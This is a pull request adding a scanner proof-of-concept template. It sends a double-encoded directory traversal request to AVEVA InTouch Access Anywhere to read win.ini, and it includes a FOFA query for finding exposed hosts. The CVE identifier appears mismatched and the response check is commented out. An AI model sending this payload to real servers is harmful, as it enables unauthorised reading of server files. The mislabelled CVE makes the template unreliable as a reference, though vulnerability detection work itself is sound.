### PR TITLE
Create poc-yaml-CVE-2022-23131.yml

### DIFF
--- a/pocs/poc-yaml-CVE-2022-23131.yml
+++ b/pocs/poc-yaml-CVE-2022-23131.yml
@@ -1,0 +1,17 @@
+name: poc-yaml-CVE-2022-23131
+manual: true
+transport: http
+rules:
+    r1:
+        request:
+            cache: true
+            method: GET
+            path: /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
+        expression: 
+            status == 200 
+expression: r1()
+# 信息部分  && response.body.bcontains(b"fonts")
+detail:
+    author: wsw1055
+    described:
+        - AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞，未授权的攻击者可利用该漏洞获取服务器敏感信息。


### PR DESCRIPTION
本 poc 是检测什么漏洞的
这个poc用来检测CVE-2022-23131(AVEVA InTouch Access Anywhere 路径遍历漏洞)

测试环境
fofa: body="InTouch Access Anywhere"

备注
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本

![image](https://user-images.githubusercontent.com/63052830/197476050-45b97de5-ac9b-4451-bf1b-88ebd41d2bdb.png)
![image](https://user-images.githubusercontent.com/63052830/197476199-2bb9bc4c-b4b7-426e-82a7-fc4b88409583.png)

